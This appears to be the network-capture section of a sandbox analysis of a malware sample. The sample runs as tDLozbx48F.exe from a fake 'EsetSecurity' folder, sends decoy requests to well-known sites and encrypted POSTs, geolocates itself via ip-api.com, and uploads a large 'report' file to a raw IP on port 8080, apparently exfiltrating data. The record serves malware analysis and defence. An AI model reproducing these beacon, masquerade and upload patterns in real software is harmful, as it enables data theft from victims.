Dec 1, 2024 22:51:42.626386881 CET	27	OUT	Data Raw: 4c 9f 5c ab 37 10 ef 4b b9 0b 9b ed 05 ae da 40 51 4b bb 57 9d 06 8e c4 c7 5a 3a Data Ascii: L\7K@QKWZ:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.16	49708	45.60.107.106	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.819439888 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive
Dec 1, 2024 22:51:44.020318031 CET	123	IN	HTTP/1.1 301 Moved Permanently Location: https://cybereason.com/de2GhgMoGn?s=144 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.16	49709	45.60.107.106	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.820607901 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive
Dec 1, 2024 22:51:44.020966053 CET	123	IN	HTTP/1.1 301 Moved Permanently Location: https://cybereason.com/de2GhgMoGn?s=144 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.16	49713	104.244.42.129	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.995469093 CET	76	OUT	GET /0My2dPrz2a?s=27 HTTP/1.1 Host: twitter.com Connection: Keep-Alive
Dec 1, 2024 22:51:44.181730986 CET	357	IN	HTTP/1.1 301 Moved Permanently perf: 7402827104 location: https://twitter.com/0My2dPrz2a?s=27 cache-control: no-cache, no-store, max-age=0 content-length: 0 x-transaction-id: 7020d8222e249a28 x-response-time: 2 x-connection-hash: 8b973e99612969a60fa916bc16fdf050a091e607134ae0124bfa4d798e37208e date: Sun, 01 Dec 2024 21:51:43 GMT server: tsa_b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.16	49712	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.998729944 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.16	49714	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:43.144803047 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.16	49716	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:44.365362883 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.16	49717	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:44.398880005 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.16	49719	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:44.659006119 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.16	49720	104.26.6.177	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:44.835586071 CET	124	OUT	POST /36XAhAh7YD?144=1 HTTP/1.1 Host: blog.cyble.com Content-Length: 144 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.16	49723	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:45.325810909 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:51:46.930413961 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:51:46 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:51:46.930476904 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:51:46.948532104 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:51:47.068856001 CET	350	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:51:47.392343044 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:51:47.558087111 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:51:47 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:51:47.558176994 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.16	49724	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:45.570065022 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive
Dec 1, 2024 22:51:47.172521114 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:51:46 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:51:47.172575951 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:51:47.173799038 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:51:47.293989897 CET	300	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
Dec 1, 2024 22:51:47.411010981 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.16	49725	66.33.60.67	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:45.786318064 CET	120	OUT	POST /hKO8byy4cV?118=0 HTTP/1.1 Host: cyware.com Content-Length: 118 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:51:46.143419981 CET	118	OUT	Data Raw: 1c 9d 30 91 75 41 07 21 20 45 c3 78 92 06 f2 cf 21 22 43 b4 2a ae 77 cc 7d 03 4c 14 69 e9 c9 26 15 62 24 0b 7f f1 ec 60 9a c5 79 1c f1 86 aa f5 f6 4f 61 81 dc 93 11 6d 25 63 13 71 f4 f2 b8 36 7b 9d 63 2f e1 e6 50 30 35 e2 1a 65 34 5b da f6 59 56 Data Ascii: 0uA! Ex!"C*w}Li&b$`yOam%cq6{c/P05e4[YVHJQ{kCT#{0Ky8
Dec 1, 2024 22:51:46.974678993 CET	33	IN	HTTP/1.0 308 Permanent Redirect
Dec 1, 2024 22:51:46.974833965 CET	157	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 79 77 61 72 65 2e 63 6f 6d 2f 68 4b 4f 38 62 79 79 34 63 56 3f 31 31 38 3d 30 0d 0a 52 65 66 72 65 73 68 3a 20 Data Ascii: Content-Type: text/plainLocation: https://cyware.com/hKO8byy4cV?118=0Refresh: 0;url=https://cyware.com/hKO8byy4cV?118=0server: VercelRedirecting...

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.16	49727	66.33.60.67	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:47.554842949 CET	120	OUT	POST /hKO8byy4cV?118=0 HTTP/1.1 Host: cyware.com Content-Length: 118 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:51:47.917473078 CET	118	OUT	Data Raw: 46 1e ce 0c be f4 1c 59 f1 9d 47 04 dd 6d 2a 6c e9 e4 b1 bc 6f 9c 6b fa 91 a4 7b b8 98 7e df 50 fe bd ea 8d 6c 0b 60 69 57 c1 0b 1f 67 9d 68 46 e0 4d cc a7 39 cc a7 a9 b2 d4 7b 1a 78 64 c0 72 bd f6 05 1f 82 9c ff de 83 48 65 ae 91 4c 92 f3 3c 35 Data Ascii: FYGm*lok{~Pl`iWghFM9{xdrHeL<5J82AFaqHCN#feABu
Dec 1, 2024 22:51:48.694442034 CET	190	IN	HTTP/1.0 308 Permanent Redirect Content-Type: text/plain Location: https://cyware.com/hKO8byy4cV?118=0 Refresh: 0;url=https://cyware.com/hKO8byy4cV?118=0 server: Vercel Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e Data Ascii: Redirecting...

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.16	49729	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:47.578602076 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.16	49730	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:47.796330929 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.16	49733	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:48.972812891 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.16	49732	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:48.972817898 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.16	49734	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:49.298333883 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.16	49735	172.217.19.164	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:49.298528910 CET	74	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.16	49736	208.95.112.1	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:49.442509890 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 1, 2024 22:51:50.687685966 CET	197	IN	HTTP/1.1 200 OK Date: Sun, 01 Dec 2024 21:51:50 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 27 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: United States8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.16	49737	140.238.218.94	8080	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:51.215532064 CET	144	OUT	PUT /PWOYf_user%40888683_report.wsr HTTP/1.1 Host: 140.238.218.94:8080 Content-Length: 91361 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.16	49739	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:02.685345888 CET	79	OUT	GET /oQJb3GUymA?s=13 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.16	49740	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:02.685348988 CET	79	OUT	GET /oQJb3GUymA?s=13 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.16	49742	172.217.19.238	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:02.690598965 CET	118	OUT	POST /G4XvFNPg1L?27=1 HTTP/1.1 Host: youtube.kz Content-Length: 27 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.16	49741	172.217.19.238	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:02.690638065 CET	118	OUT	POST /G4XvFNPg1L?27=1 HTTP/1.1 Host: youtube.kz Content-Length: 27 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.16	49743	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:02.995702982 CET	75	OUT	GET /M82hfWR7nN?s=118 HTTP/1.1 Host: google.kz Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.16	49744	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.007199049 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.16	49747	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.037462950 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.16	49749	104.244.42.129	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.382965088 CET	76	OUT	GET /0My2dPrz2a?s=27 HTTP/1.1 Host: twitter.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.16	49750	45.60.107.106	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:03.404030085 CET	80	OUT	GET /de2GhgMoGn?s=144 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

